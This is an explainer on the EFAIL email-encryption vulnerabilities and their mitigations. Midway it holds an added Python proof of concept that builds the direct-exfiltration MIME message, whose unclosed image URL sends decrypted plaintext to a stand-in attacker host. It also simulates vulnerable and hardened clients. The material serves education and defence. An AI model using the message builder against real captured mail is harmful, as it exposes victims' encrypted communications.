EFAIL is the name of a newly published set of vulnerabilities in the way email clients handle OpenPGP and S/MIME encrypted messages. Attackers can exploit them to obtain the plaintext of encrypted emails.

OpenPGP is an encryption standard that Internet users can use to protect sensitive data such as emails. S/MIME is another email encryption standard, widely used in corporate environments.

EFAIL requires that the attacker has already gained access to the encrypted emails and that the target runs client software that is vulnerable to one of the two attack types.

An attacker could gain access to encrypted emails by monitoring network traffic, compromising email servers or the computers of users, or gaining access to backup servers.

The attack works in the following way:

  • The attacker gets hold of an encrypted email.
  • The encrypted email is modified and sent to the target.
  • The target's email client decrypts the email and loads external content, and that request transmits the plaintext message to the attacker.

The attacker may use two different types of attacks. The first is called direct exfiltration by the researchers. It works against clients such as Mozilla Thunderbird, Postbox, MailMate, iOS Mail and Apple Mail, and it lets the attacker exfiltrate the plaintext of the encrypted email directly, without modifying the ciphertext itself.

This attack works in the following way:

1. The attacker creates a new multipart email message and prepares it in a special way. It consists of three parts:
  1. An HTML part containing an image tag whose src attribute points to a server the attacker controls; the attribute value is opened with a quote but not closed.
  2. The actual encrypted message, using PGP or S/MIME, copied in unchanged.
  3. A third part that closes the open attribute and tag of the first part.

2. The message is sent to the target.
3. The target's email client decrypts the encrypted part and renders all three parts as a single HTML document. Because the quote in the first part is still open, the decrypted plaintext becomes part of the image URL, and the client requests that URL from the attacker's server.
4. The attacker monitors requests to the server and reads the secret message out of the URL this way.
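
The three-part message and the two rendering behaviours, as an added example that is not part of the article or of the researchers' material. The attacker host, the victim's secret text and the base64 "cipher" standing in for real S/MIME decryption are constructed for this example; a real client would decrypt a genuine pkcs7-mime body, but direct exfiltration does not interact with the cipher at all, only with how the decrypted output is stitched into the HTML:

```python
"""Added example: build the EFAIL direct-exfiltration message layout and
simulate a vulnerable and a hardened client rendering it.  The attacker
host, the secret text and the stand-in cipher are constructed values."""
import base64
import re
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from urllib.parse import unquote

# Constructed values: the attacker's web server and the victim's secret.
ATTACKER_URL = "http://attacker.example/"
SECRET_PLAINTEXT = "Board meeting moved to Thursday. Wire password: hunter2"


def stand_in_encrypt(plaintext: str) -> bytes:
    # Stand-in for real S/MIME encryption (assumption for the demo only).
    # Direct exfiltration never touches the cipher, so any reversible
    # transform reproduces the attack faithfully.
    return base64.b64encode(plaintext.encode("utf-8"))


def client_decrypt(ciphertext: bytes) -> str:
    # Stand-in for the client's S/MIME decryption of the captured part.
    return base64.b64decode(ciphertext).decode("utf-8")


def build_efail_message(captured_ciphertext: bytes) -> MIMEMultipart:
    """Wrap a captured ciphertext in the attacker's three-part MIME layout."""
    msg = MIMEMultipart("mixed")
    msg["Subject"] = "Re: your message"
    msg["From"] = "attacker@attacker.example"
    msg["To"] = "victim@victim.example"
    # Part 1: image tag whose src attribute is opened with a quote, never closed.
    msg.attach(MIMEText(f'<img src="{ATTACKER_URL}', "html"))
    # Part 2: the captured encrypted message, re-used unchanged.
    msg.attach(MIMEApplication(captured_ciphertext, "pkcs7-mime", name="smime.p7m"))
    # Part 3: closes the quote and the tag opened in part 1.
    msg.attach(MIMEText('">', "html"))
    return msg


def leaf_parts(msg):
    return [p for p in msg.walk() if not p.is_multipart()]


def part_as_html(part) -> str:
    """What the client renders for one part: decrypted text for the encrypted part."""
    body = part.get_payload(decode=True)
    if part.get_content_type() == "application/pkcs7-mime":
        return client_decrypt(body)
    return body.decode(part.get_content_charset() or "utf-8")


# Only a src value with both quotes present counts as a complete attribute.
IMG_SRC = re.compile(r'<img\s[^>]*?src="([^"]*)"', re.IGNORECASE | re.DOTALL)


def remote_loads_vulnerable(msg) -> list[str]:
    """Vulnerable client: all parts are concatenated into ONE HTML document
    before image URLs are resolved, so the plaintext lands inside the URL."""
    html = "".join(part_as_html(p) for p in leaf_parts(msg))
    return IMG_SRC.findall(html)


def remote_loads_hardened(msg, allow_remote_content: bool = False) -> list[str]:
    """Hardened client: remote content is only fetched when explicitly allowed,
    and each part is rendered as its own document, so an unclosed quote in one
    part cannot swallow the decrypted text of the next one."""
    if not allow_remote_content:
        return []
    urls: list[str] = []
    for p in leaf_parts(msg):
        urls.extend(IMG_SRC.findall(part_as_html(p)))
    return urls


def exfiltrated_plaintext(urls) -> str:
    """What the attacker reads out of the web server's request log."""
    return "".join(unquote(u[len(ATTACKER_URL):]) for u in urls if u.startswith(ATTACKER_URL))


if __name__ == "__main__":
    msg = build_efail_message(stand_in_encrypt(SECRET_PLAINTEXT))
    print(msg.as_string())
    hits = remote_loads_vulnerable(msg)
    print("vulnerable client requests:", hits)
    print("attacker log shows:", exfiltrated_plaintext(hits))
    print("hardened client requests:", remote_loads_hardened(msg, allow_remote_content=True))
```

Running the script prints the crafted message and then the single URL the vulnerable client requests, with the secret text appended after the attacker's host; the hardened renderer issues no request even when remote content is allowed, because part 1 on its own never yields a complete src attribute.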

The second attack type, which the researchers call the CBC/CFB gadget attack, manipulates the ciphertext itself by abusing the encryption modes the two standards use, rather than relying on how a client stitches MIME parts together, and it works against a larger number of email clients. In fact, the only clients the researchers found to be protected against the S/MIME variant are Claws Mail and Mutt, whereas more clients are protected against the PGP-targeting variant.

What can you do to protect yourself?

The researchers suggest the following mitigation strategies:

  • Short Term: Disable decryption of S/MIME or PGP emails in the email client. Copy and paste the encrypted text into a separate program to decrypt it.
  • Short Term: Disable HTML rendering in the email client for all email messages.
  • Medium Term: Software companies need to patch the issues in their client applications.
  • Long Term: The OpenPGP and S/MIME standards need to be updated.

While not explicitly mentioned by the researchers, you may also disable the loading of remote content in the email client. The attack depends on the client fetching an image from the attacker's server, so blocking remote content closes that channel even if the message is decrypted and rendered as HTML.

Thunderbird users may want to check out our guide Switch Between HTML And Plain Text Emails In Thunderbird to enable plaintext email messages in the client. It is furthermore advised to disable the loading of any remote content by disabling "allow remote content in messages" under Tools > Options > Privacy.

Additional information about the vulnerability is available on the website the researchers created.